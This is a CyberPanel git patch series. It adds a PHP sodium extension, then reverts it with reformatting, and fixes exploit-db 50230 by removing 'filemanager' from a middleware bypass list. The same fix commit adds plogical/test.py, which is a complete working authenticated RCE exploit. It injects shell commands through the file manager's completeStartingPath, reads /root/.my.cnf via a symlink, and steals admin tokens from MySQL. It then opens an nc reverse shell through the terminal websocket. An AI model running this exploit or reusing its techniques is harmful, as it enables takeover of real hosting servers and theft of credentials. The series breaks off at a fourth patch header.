From 799dd297169d09e16b58eb4d238262ae378bb90e Mon Sep 17 00:00:00 2001 From: merkys7 Date: Tue, 24 Aug 2021 10:57:55 +0300 Subject: [PATCH 1/4] ManagePHP: Add lsphp-sodium extension --- install/installCyberPanel.py | 8 ++++---- managePHP/php72.xml | 6 ++++++ managePHP/php73.xml | 6 ++++++ managePHP/php74.xml | 6 ++++++ managePHP/php80.xml | 6 ++++++ managePHP/ubuntuphp72.xml | 6 ++++++ managePHP/ubuntuphp73.xml | 6 ++++++ managePHP/ubuntuphp74.xml | 6 ++++++ managePHP/ubuntuphp80.xml | 6 ++++++ 9 files changed, 52 insertions(+), 4 deletions(-) diff --git a/install/installCyberPanel.py b/install/installCyberPanel.py index c3b7cd202..ade7ef339 100755 --- a/install/installCyberPanel.py +++ b/install/installCyberPanel.py @@ -191,7 +191,7 @@ class InstallCyberPanel: command = 'DEBIAN_FRONTEND=noninteractive apt-get -y install ' \ 'lsphp7? lsphp7?-common lsphp7?-curl lsphp7?-dev lsphp7?-imap lsphp7?-intl lsphp7?-json ' \ 'lsphp7?-ldap lsphp7?-mysql lsphp7?-opcache lsphp7?-pspell lsphp7?-recode ' \ - 'lsphp7?-sqlite3 lsphp7?-tidy' + 'lsphp7?-sqlite3 lsphp7?-tidy lsphp7?-sodium' os.system(command) @@ -218,7 +218,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp72 lsphp72-json lsphp72-xmlrpc lsphp72-xml lsphp72-soap lsphp72-snmp ' \ 'lsphp72-recode lsphp72-pspell lsphp72-process lsphp72-pgsql lsphp72-pear lsphp72-pdo lsphp72-opcache ' \ 'lsphp72-odbc lsphp72-mysqlnd lsphp72-mcrypt lsphp72-mbstring lsphp72-ldap lsphp72-intl lsphp72-imap ' \ - 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath' + 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath lsphp72-sodium' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) @@ -227,7 +227,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp73 lsphp73-json lsphp73-xmlrpc lsphp73-xml lsphp73-tidy lsphp73-soap lsphp73-snmp ' \ 'lsphp73-recode lsphp73-pspell lsphp73-process lsphp73-pgsql lsphp73-pear lsphp73-pdo lsphp73-opcache ' \ 'lsphp73-odbc lsphp73-mysqlnd lsphp73-mcrypt lsphp73-mbstring lsphp73-ldap lsphp73-intl lsphp73-imap ' \ - 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath' + 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath lsphp73-sodium' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) @@ -235,7 +235,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp74 lsphp74-json lsphp74-xmlrpc lsphp74-xml lsphp74-tidy lsphp74-soap lsphp74-snmp ' \ 'lsphp74-recode lsphp74-pspell lsphp74-process lsphp74-pgsql lsphp74-pear lsphp74-pdo lsphp74-opcache ' \ 'lsphp74-odbc lsphp74-mysqlnd lsphp74-mcrypt lsphp74-mbstring lsphp74-ldap lsphp74-intl lsphp74-imap ' \ - 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath' + 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath lsphp74-sodium' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) diff --git a/managePHP/php72.xml b/managePHP/php72.xml index fd5bee175..7967b49cc 100755 --- a/managePHP/php72.xml +++ b/managePHP/php72.xml @@ -272,4 +272,10 @@ 0 + + lsphp72-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/php73.xml b/managePHP/php73.xml index a2f4d3fbf..c2383820a 100755 --- a/managePHP/php73.xml +++ b/managePHP/php73.xml @@ -272,4 +272,10 @@ 0 + + lsphp73-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/php74.xml b/managePHP/php74.xml index 63f5727e5..c062a1a33 100755 --- a/managePHP/php74.xml +++ b/managePHP/php74.xml @@ -272,4 +272,10 @@ 0 + + lsphp74-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/php80.xml b/managePHP/php80.xml index c95d94cee..3f35d5e91 100755 --- a/managePHP/php80.xml +++ b/managePHP/php80.xml @@ -272,4 +272,10 @@ 0 + + lsphp80-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp72.xml b/managePHP/ubuntuphp72.xml index 9914be67a..ed5c33720 100755 --- a/managePHP/ubuntuphp72.xml +++ b/managePHP/ubuntuphp72.xml @@ -122,4 +122,10 @@ 0 + + lsphp72-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp73.xml b/managePHP/ubuntuphp73.xml index 175b09399..915ac3755 100755 --- a/managePHP/ubuntuphp73.xml +++ b/managePHP/ubuntuphp73.xml @@ -122,4 +122,10 @@ 0 + + lsphp73-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp74.xml b/managePHP/ubuntuphp74.xml index f60add02a..3652133d7 100755 --- a/managePHP/ubuntuphp74.xml +++ b/managePHP/ubuntuphp74.xml @@ -122,4 +122,10 @@ 0 + + lsphp74-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp80.xml b/managePHP/ubuntuphp80.xml index 61ef9d667..8a1d7ca0e 100755 --- a/managePHP/ubuntuphp80.xml +++ b/managePHP/ubuntuphp80.xml @@ -122,4 +122,10 @@ 0 + + lsphp80-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + From 5da94b01fdfb578a7650ab6078fafa46274a3715 Mon Sep 17 00:00:00 2001 From: Usman Nasir Date: Wed, 25 Aug 2021 14:37:37 +0500 Subject: [PATCH 2/4] bug fix: install --- install/installCyberPanel.py | 89 +++++++++++++++++------------------- 1 file changed, 42 insertions(+), 47 deletions(-) diff --git a/install/installCyberPanel.py b/install/installCyberPanel.py index ade7ef339..c6d364552 100755 --- a/install/installCyberPanel.py +++ b/install/installCyberPanel.py @@ -10,10 +10,11 @@ import install from os.path import exists import time -#distros -centos=0 -ubuntu=1 -cent8=2 +# distros +centos = 0 +ubuntu = 1 +cent8 = 2 + def get_Ubuntu_release(): release = -1 @@ -34,12 +35,13 @@ def get_Ubuntu_release(): return release -class InstallCyberPanel: +class InstallCyberPanel: mysql_Root_password = "" mysqlPassword = "" - def __init__(self, rootPath, cwd, distro, ent, serial = None, port = None, ftp = None, dns = None, publicip = None, remotemysql = None , mysqlhost = None, mysqldb = None, mysqluser = None, mysqlpassword = None, mysqlport = None): + def __init__(self, rootPath, cwd, distro, ent, serial=None, port=None, ftp=None, dns=None, publicip=None, + remotemysql=None, mysqlhost=None, mysqldb=None, mysqluser=None, mysqlpassword=None, mysqlport=None): self.server_root_path = rootPath self.cwd = cwd self.distro = distro @@ -101,7 +103,6 @@ class InstallCyberPanel: writeSerial.writelines(self.serial) writeSerial.close() - shutil.copy('litespeed/install.sh', 'lsws-6.0/') shutil.copy('litespeed/functions.sh', 'lsws-6.0/') @@ -132,7 +133,7 @@ class InstallCyberPanel: return 1 def reStartLiteSpeed(self): - command = self.server_root_path+"bin/lswsctrl restart" + command = self.server_root_path + "bin/lswsctrl restart" install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) def fix_ols_configs(self): @@ -142,7 +143,7 @@ class InstallCyberPanel: ## remove example virtual host - data = open(self.server_root_path+"conf/httpd_config.conf",'r').readlines() + data = open(self.server_root_path + "conf/httpd_config.conf", 'r').readlines() writeDataToFile = open(self.server_root_path + "conf/httpd_config.conf", 'w') @@ -165,13 +166,13 @@ class InstallCyberPanel: try: InstallCyberPanel.stdOut("Changing default port to 80..", 1) - data = open(self.server_root_path+"conf/httpd_config.conf").readlines() + data = open(self.server_root_path + "conf/httpd_config.conf").readlines() - writeDataToFile = open(self.server_root_path+"conf/httpd_config.conf", 'w') + writeDataToFile = open(self.server_root_path + "conf/httpd_config.conf", 'w') for items in data: if (items.find("*:8088") > -1): - writeDataToFile.writelines(items.replace("*:8088","*:80")) + writeDataToFile.writelines(items.replace("*:8088", "*:80")) else: writeDataToFile.writelines(items) @@ -191,7 +192,7 @@ class InstallCyberPanel: command = 'DEBIAN_FRONTEND=noninteractive apt-get -y install ' \ 'lsphp7? lsphp7?-common lsphp7?-curl lsphp7?-dev lsphp7?-imap lsphp7?-intl lsphp7?-json ' \ 'lsphp7?-ldap lsphp7?-mysql lsphp7?-opcache lsphp7?-pspell lsphp7?-recode ' \ - 'lsphp7?-sqlite3 lsphp7?-tidy lsphp7?-sodium' + 'lsphp7?-sqlite3 lsphp7?-tidy' os.system(command) @@ -207,7 +208,6 @@ class InstallCyberPanel: ## only php 71 if self.distro == centos: - command = 'yum install lsphp71 lsphp71-json lsphp71-xmlrpc lsphp71-xml lsphp71-soap lsphp71-snmp ' \ 'lsphp71-recode lsphp71-pspell lsphp71-process lsphp71-pgsql lsphp71-pear lsphp71-pdo lsphp71-opcache ' \ 'lsphp71-odbc lsphp71-mysqlnd lsphp71-mcrypt lsphp71-mbstring lsphp71-ldap lsphp71-intl lsphp71-imap ' \ @@ -218,16 +218,15 @@ class InstallCyberPanel: command = 'yum install -y lsphp72 lsphp72-json lsphp72-xmlrpc lsphp72-xml lsphp72-soap lsphp72-snmp ' \ 'lsphp72-recode lsphp72-pspell lsphp72-process lsphp72-pgsql lsphp72-pear lsphp72-pdo lsphp72-opcache ' \ 'lsphp72-odbc lsphp72-mysqlnd lsphp72-mcrypt lsphp72-mbstring lsphp72-ldap lsphp72-intl lsphp72-imap ' \ - 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath lsphp72-sodium' + 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) - ## only php 73 command = 'yum install -y lsphp73 lsphp73-json lsphp73-xmlrpc lsphp73-xml lsphp73-tidy lsphp73-soap lsphp73-snmp ' \ 'lsphp73-recode lsphp73-pspell lsphp73-process lsphp73-pgsql lsphp73-pear lsphp73-pdo lsphp73-opcache ' \ 'lsphp73-odbc lsphp73-mysqlnd lsphp73-mcrypt lsphp73-mbstring lsphp73-ldap lsphp73-intl lsphp73-imap ' \ - 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath lsphp73-sodium' + 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) @@ -235,7 +234,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp74 lsphp74-json lsphp74-xmlrpc lsphp74-xml lsphp74-tidy lsphp74-soap lsphp74-snmp ' \ 'lsphp74-recode lsphp74-pspell lsphp74-process lsphp74-pgsql lsphp74-pear lsphp74-pdo lsphp74-opcache ' \ 'lsphp74-odbc lsphp74-mysqlnd lsphp74-mcrypt lsphp74-mbstring lsphp74-ldap lsphp74-intl lsphp74-imap ' \ - 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath lsphp74-sodium' + 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) @@ -276,13 +275,14 @@ class InstallCyberPanel: self.startMariaDB() - def changeMYSQLRootPassword(self): if self.remotemysql == 'OFF': if self.distro == ubuntu: - passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';UPDATE user SET plugin='' WHERE User='root';flush privileges;" % (InstallCyberPanel.mysql_Root_password) + passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';UPDATE user SET plugin='' WHERE User='root';flush privileges;" % ( + InstallCyberPanel.mysql_Root_password) else: - passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';flush privileges;" % (InstallCyberPanel.mysql_Root_password) + passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';flush privileges;" % ( + InstallCyberPanel.mysql_Root_password) command = 'mysql -u root -e "' + passwordCMD + '"' @@ -366,7 +366,6 @@ class InstallCyberPanel: command = 'dnf install pure-ftpd -y' install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) - ####### Install pureftpd to system startup command = "systemctl enable " + install.preFlightsChecks.pureFTPDServiceName(self.distro) @@ -379,7 +378,7 @@ class InstallCyberPanel: command = 'useradd -u 2001 -s /bin/false -d /bin/null -c "pureftpd user" -g ftpgroup ftpuser' install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) - + def startPureFTPD(self): ############## Start pureftpd ###################### if self.distro == ubuntu: @@ -399,7 +398,8 @@ class InstallCyberPanel: except: logging.InstallLog.writeToFile("[ERROR] Could not create directory for FTP SSL") - if (self.distro == centos or self.distro == cent8) or (self.distro == ubuntu and get_Ubuntu_release() == 18.14): + if (self.distro == centos or self.distro == cent8) or ( + self.distro == ubuntu and get_Ubuntu_release() == 18.14): command = 'openssl req -newkey rsa:1024 -new -nodes -x509 -days 3650 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem' else: command = 'openssl req -x509 -nodes -days 7300 -newkey rsa:2048 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem' @@ -417,7 +417,7 @@ class InstallCyberPanel: shutil.copytree("pure-ftpd-one", ftpdPath) else: if mysql == 'Two': - shutil.copytree("pure-ftpd",ftpdPath) + shutil.copytree("pure-ftpd", ftpdPath) else: shutil.copytree("pure-ftpd-one", ftpdPath) @@ -429,18 +429,17 @@ class InstallCyberPanel: except OSError as err: self.stdOut("[ERROR] Error creating extra pure-ftpd directories: " + str(err), ". Should be ok", 1) - data = open(ftpdPath+"/pureftpd-mysql.conf","r").readlines() + data = open(ftpdPath + "/pureftpd-mysql.conf", "r").readlines() - writeDataToFile = open(ftpdPath+"/pureftpd-mysql.conf","w") + writeDataToFile = open(ftpdPath + "/pureftpd-mysql.conf", "w") - dataWritten = "MYSQLPassword "+InstallCyberPanel.mysqlPassword+'\n' + dataWritten = "MYSQLPassword " + InstallCyberPanel.mysqlPassword + '\n' for items in data: - if items.find("MYSQLPassword")>-1: + if items.find("MYSQLPassword") > -1: writeDataToFile.writelines(dataWritten) else: writeDataToFile.writelines(items) - writeDataToFile.close() ftpConfPath = '/etc/pure-ftpd/pureftpd-mysql.conf' @@ -459,7 +458,7 @@ class InstallCyberPanel: if os.path.exists('/etc/pure-ftpd/db/mysql.conf'): os.remove('/etc/pure-ftpd/db/mysql.conf') - shutil.copy(ftpdPath+"/pureftpd-mysql.conf", '/etc/pure-ftpd/db/mysql.conf') + shutil.copy(ftpdPath + "/pureftpd-mysql.conf", '/etc/pure-ftpd/db/mysql.conf') else: shutil.copy(ftpdPath + "/pureftpd-mysql.conf", '/etc/pure-ftpd/db/mysql.conf') @@ -478,7 +477,6 @@ class InstallCyberPanel: command = 'echo "/etc/pure-ftpd/db/mysql.conf" > /etc/pure-ftpd/conf/MySQLConfigFile' subprocess.call(command, shell=True) - command = 'ln -s /etc/pure-ftpd/conf/MySQLConfigFile /etc/pure-ftpd/auth/30mysql' install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) @@ -503,7 +501,6 @@ class InstallCyberPanel: command = 'systemctl disable systemd-resolved.service' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) - try: os.rename('/etc/resolv.conf', 'etc/resolved.conf') except OSError as e: @@ -513,10 +510,9 @@ class InstallCyberPanel: try: os.remove('/etc/resolv.conf') except OSError as e1: - InstallCyberPanel.stdOut("[ERROR] Unable to remove existing /etc/resolv.conf to install PowerDNS: " + - str(e1), 1, 1, os.EX_OSERR) - - + InstallCyberPanel.stdOut( + "[ERROR] Unable to remove existing /etc/resolv.conf to install PowerDNS: " + + str(e1), 1, 1, os.EX_OSERR) # try: # f = open('/etc/resolv.conf', 'a') @@ -581,12 +577,11 @@ class InstallCyberPanel: else: writeDataToFile.writelines(items) - #if self.distro == ubuntu: + # if self.distro == ubuntu: # os.fchmod(writeDataToFile.fileno(), stat.S_IRUSR | stat.S_IWUSR) writeDataToFile.close() - if self.remotemysql == 'ON': command = "sed -i 's|gmysql-host=localhost|gmysql-host=%s|g' %s" % (self.mysqlhost, dnsPath) install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) @@ -612,8 +607,8 @@ class InstallCyberPanel: install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) -def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns = None, publicip = None, remotemysql = None , mysqlhost = None, mysqldb = None, mysqluser = None, mysqlpassword = None, mysqlport = None): - +def Main(cwd, mysql, distro, ent, serial=None, port="8090", ftp=None, dns=None, publicip=None, remotemysql=None, + mysqlhost=None, mysqldb=None, mysqluser=None, mysqlpassword=None, mysqlport=None): InstallCyberPanel.mysqlPassword = randomPassword.generate_pass() InstallCyberPanel.mysql_Root_password = randomPassword.generate_pass() @@ -629,7 +624,8 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns password.writelines(InstallCyberPanel.mysql_Root_password) password.close() else: - mysqlData = {'remotemysql': remotemysql, 'mysqlhost': mysqlhost, 'mysqldb':mysqldb, 'mysqluser': mysqluser, 'mysqlpassword': mysqlpassword, 'mysqlport': mysqlport} + mysqlData = {'remotemysql': remotemysql, 'mysqlhost': mysqlhost, 'mysqldb': mysqldb, 'mysqluser': mysqluser, + 'mysqlpassword': mysqlpassword, 'mysqlport': mysqlport} from json import dumps writeToFile = open(file_name, 'w') writeToFile.write(dumps(mysqlData)) @@ -639,8 +635,6 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns print(open(file_name, 'r').read()) time.sleep(10) - - try: command = 'chmod 640 %s' % (file_name) install.preFlightsChecks.call(command, distro, '[chmod]', @@ -658,7 +652,8 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns else: InstallCyberPanel.mysqlPassword = InstallCyberPanel.mysql_Root_password - installer = InstallCyberPanel("/usr/local/lsws/",cwd, distro, ent, serial, port, ftp, dns, publicip, remotemysql, mysqlhost, mysqldb, mysqluser, mysqlpassword, mysqlport) + installer = InstallCyberPanel("/usr/local/lsws/", cwd, distro, ent, serial, port, ftp, dns, publicip, remotemysql, + mysqlhost, mysqldb, mysqluser, mysqlpassword, mysqlport) logging.InstallLog.writeToFile('Installing LiteSpeed Web server,40') installer.installLiteSpeed() @@ -679,7 +674,7 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns if distro == ubuntu: installer.fixMariaDB() - mysqlUtilities.createDatabase("cyberpanel","cyberpanel", InstallCyberPanel.mysqlPassword, publicip) + mysqlUtilities.createDatabase("cyberpanel", "cyberpanel", InstallCyberPanel.mysqlPassword, publicip) if ftp == None: installer.installPureFTPD() @@ -699,4 +694,4 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns if dns == 'ON': installer.installPowerDNS() installer.installPowerDNSConfigurations(InstallCyberPanel.mysqlPassword, mysql) - installer.startPowerDNS() + installer.startPowerDNS() \ No newline at end of file From 2e8212169e010635bdc5fd082995c5ca1944af03 Mon Sep 17 00:00:00 2001 From: Usman Nasir Date: Sun, 29 Aug 2021 19:47:23 +0500 Subject: [PATCH 3/4] resolve https://www.exploit-db.com/exploits/50230 --- CyberCP/secMiddleware.py | 2 +- plogical/test.py | 233 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 234 insertions(+), 1 deletion(-) diff --git a/CyberCP/secMiddleware.py b/CyberCP/secMiddleware.py index 46f683235..47e5086c5 100755 --- a/CyberCP/secMiddleware.py +++ b/CyberCP/secMiddleware.py @@ -72,7 +72,7 @@ class secMiddleware: final_json = json.dumps(final_dic) return HttpResponse(final_json) - if request.build_absolute_uri().find('api/verifyConn') > -1 or request.build_absolute_uri().find('webhook') > -1 or request.build_absolute_uri().find('saveSpamAssassinConfigurations') > -1 or request.build_absolute_uri().find('docker') > -1 or request.build_absolute_uri().find('cloudAPI') > -1 or request.build_absolute_uri().find('filemanager') > -1 or request.build_absolute_uri().find('verifyLogin') > -1 or request.build_absolute_uri().find('submitUserCreation') > -1: + if request.build_absolute_uri().find('api/verifyConn') > -1 or request.build_absolute_uri().find('webhook') > -1 or request.build_absolute_uri().find('saveSpamAssassinConfigurations') > -1 or request.build_absolute_uri().find('docker') > -1 or request.build_absolute_uri().find('cloudAPI') > -1 or request.build_absolute_uri().find('verifyLogin') > -1 or request.build_absolute_uri().find('submitUserCreation') > -1: continue if key == 'recordContentAAAA' or key == 'backupDestinations' or key == 'ports' \ or key == 'imageByPass' or key == 'passwordByPass' or key == 'cronCommand' \ diff --git a/plogical/test.py b/plogical/test.py index e69de29bb..88ad1362c 100644 --- a/plogical/test.py +++ b/plogical/test.py @@ -0,0 +1,233 @@ +# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated) +# Date: 27.08.2021 +# Author: Numan Türle +# Vendor Homepage: https://cyberpanel.net/ +# Software Link: https://github.com/usmannasir/cyberpanel +# Version: <=2.1 +# https://www.youtube.com/watch?v=J_8iLELVgkE + + +# !/usr/bin/python3 +# -*- coding: utf-8 -*- +# CyberPanel - Remote Code Execution (Authenticated) +# author: twitter.com/numanturle +# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE] +# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password + + +import argparse, requests, warnings, json, re, base64, websocket, ssl, _thread, time +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from cmd import Cmd + +warnings.simplefilter('ignore', InsecureRequestWarning) + + +def init(): + parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution') + parser.add_argument('-u', '--host', help='Host', type=str, required=True) + parser.add_argument('-l', '--login', help='Username', type=str, required=True) + parser.add_argument('-p', '--password', help='Password', type=str, required=True) + parser.add_argument('-f', '--file', help='File', type=str) + args = parser.parse_args() + exploit(args) + + +def exploit(args): + def on_open(ws): + verifyPath, socket_password + print("[+] Socket connection successful") + print("[+] Trying a reverse connection") + ws.send(json.dumps({"tp": "init", "data": {"verifyPath": verifyPath, "password": socket_password}})) + ws.send(json.dumps( + {"tp": "client", "data": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r", + "verifyPath": verifyPath, "password": socket_password})) + ws.close() + + def on_close(ws, close_status_code, close_msg): + print("[+] Successful") + print("[!] Disconnect from socket") + + session = requests.Session() + target = "https://{}:8090".format(args.host) + username = args.login + password = args.password + + print("[+] Target {}".format(target)) + + response = session.get(target, verify=False) + session_hand = session.cookies.get_dict() + token = session_hand["csrftoken"] + + print("[+] Token {}".format(token)) + + headers = { + 'X-Csrftoken': token, + 'Cookie': 'csrftoken={}'.format(token), + 'Referer': target + } + + login = session.post(target + "/verifyLogin", headers=headers, verify=False, + json={"username": username, "password": password, "languageSelection": "english"}) + login_json = json.loads(login.content) + + if login_json["loginStatus"]: + session_hand_login = session.cookies.get_dict() + + print("[+] Login Success") + print("[+] Send request fetch websites list") + + headers = { + 'X-Csrftoken': session_hand_login["csrftoken"], + 'Cookie': 'csrftoken={};sessionid={}'.format(token, session_hand_login["sessionid"]), + 'Referer': target + } + + feth_weblist = session.post(target + "/websites/fetchWebsitesList", headers=headers, verify=False, + json={"page": 1, "recordsToShow": 10}) + feth_weblist_json = json.loads(feth_weblist.content) + + if feth_weblist_json["data"]: + + weblist_json = json.loads(feth_weblist_json["data"]) + domain = weblist_json[0]["domain"] + domain_folder = "/home/{}".format(domain) + + print("[+] Successfully {} selected".format(domain)) + print("[+] Creating ssh pub") + + remove_ssh_folder = session.post(target + "/filemanager/controller", headers=headers, verify=False, + json={"path": domain_folder, "method": "deleteFolderOrFile", + "fileAndFolders": [".ssh"], "domainRandomSeed": "", + "domainName": domain, "skipTrash": 1}) + create_ssh = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, + json={"domain": domain, "folder": "{}".format(domain_folder)}) + create_ssh_json = json.loads(create_ssh.content) + + if create_ssh_json["status"]: + key = create_ssh_json["deploymentKey"] + + print("[+] Key : {}".format(key)) + + explode_key = key.split() + explode_username = explode_key[-1].split("@") + + if explode_username[0]: + username = explode_username[0] + hostname = explode_username[1] + + print("[+] {} username selected".format(username)) + print("[+] Preparing for symlink attack") + print("[+] Attempting symlink attack with user-level command execution vulnerability #1") + + target_file = args.file + if not target_file: + target_file = "/root/.my.cnf" + domain_folder_ssh = "{}/.ssh".format(domain_folder) + command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh, username, target_file, + domain_folder_ssh, username) + + completeStartingPath = "{}';{};'".format(domain_folder, command) + print('complete starting path: %s' % completeStartingPath) + time.sleep(5) + # filemanager/controller - completeStartingPath - command execution vulnerability + + symlink = session.post(target + "/filemanager/controller", headers=headers, verify=False, + json={"completeStartingPath": completeStartingPath, "method": "listForTable", + "home": domain_folder, "domainRandomSeed": "", "domainName": domain}) + symlink_json = json.loads(symlink.content) + + if symlink_json["status"]: + print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file)) + + read_file = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, + json={"domain": domain, "folder": "{}".format(domain_folder)}) + read_file_json = json.loads(read_file.content) + read_file = read_file_json["deploymentKey"] + if not args.file: + print("-----------------------------------") + print(read_file.strip()) + print("-----------------------------------") + + mysql_password = re.findall('password=\"(.*?)\"', read_file)[0] + steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format( + mysql_password, domain_folder) + + print("[+] Fetching users tokens") + + completeStartingPath = "{}';{}".format(domain_folder, steal_token) + steal_token_request = session.post(target + "/filemanager/controller", headers=headers, + verify=False, + json={"completeStartingPath": completeStartingPath, + "method": "listForTable", "home": domain_folder, + "domainRandomSeed": "", "domainName": domain}) + token_file = domain_folder + "/token.txt" + steal_token_read_request = session.post(target + "/filemanager/controller", headers=headers, + verify=False, json={"fileName": token_file, + "method": "readFileContents", + "domainRandomSeed": "", + "domainName": domain}) + leak = json.loads(steal_token_read_request.content) + leak = leak["fileContents"].replace("Basic ", "").strip().split("\n")[1:] + print("------------------------------") + for user in leak: + b64de = base64.b64decode(user).decode('utf-8') + exp_username = b64de.split(":") + if exp_username[0] == "admin": + admin_password = exp_username[1] + print("[+] " + b64de) + print("------------------------------") + print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~") + print("[+] Try login admin") + + headers = { + 'X-Csrftoken': token, + 'Cookie': 'csrftoken={}'.format(token), + 'Referer': target + } + login_admin = session.post(target + "/verifyLogin", headers=headers, verify=False, + json={"username": "admin", "password": admin_password, + "languageSelection": "english"}) + login_json = json.loads(login_admin.content) + if login_json["loginStatus"]: + session_hand_login = session.cookies.get_dict() + + print("[+] 4dm1n_l061n_5ucc355") + print("[+] c0nn3c71n6_70_73rm1n4l") + headers = { + 'X-Csrftoken': session_hand_login["csrftoken"], + 'Cookie': 'csrftoken={};sessionid={}'.format(token, + session_hand_login["sessionid"]), + 'Referer': target + } + + get_websocket_token = session.get(target + "/Terminal", headers=headers, verify=False) + verifyPath = \ + re.findall('id=\"verifyPath\">(.*?)', str(get_websocket_token.content))[-1] + socket_password = \ + re.findall('id=\"password\">(.*?)', str(get_websocket_token.content))[-1] + print("[+] verifyPath {}".format(verifyPath)) + print("[+] socketPassword {}".format(socket_password)) + print("[+] Trying to connect to socket") + ws = websocket.WebSocketApp("wss://{}:5678".format(args.host), + on_open=on_open, + on_close=on_close) + ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE}) + + else: + print("[-] Auto admin login failed") + else: + print(read_file) + else: + print("[-] Unexpected") + else: + print("[-] Username selected failed") + else: + print("[-] Fail ssh pub") + else: + print("[-] List error") + else: + print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"])) + + +if __name__ == "__main__": + init() \ No newline at end of file From be9f5d762029522616c1453ccf5b5a8ba97ab191 Mon Sep 17 00:00:00 2001 From: Usman Nasir Date: Sun, 29 Aug 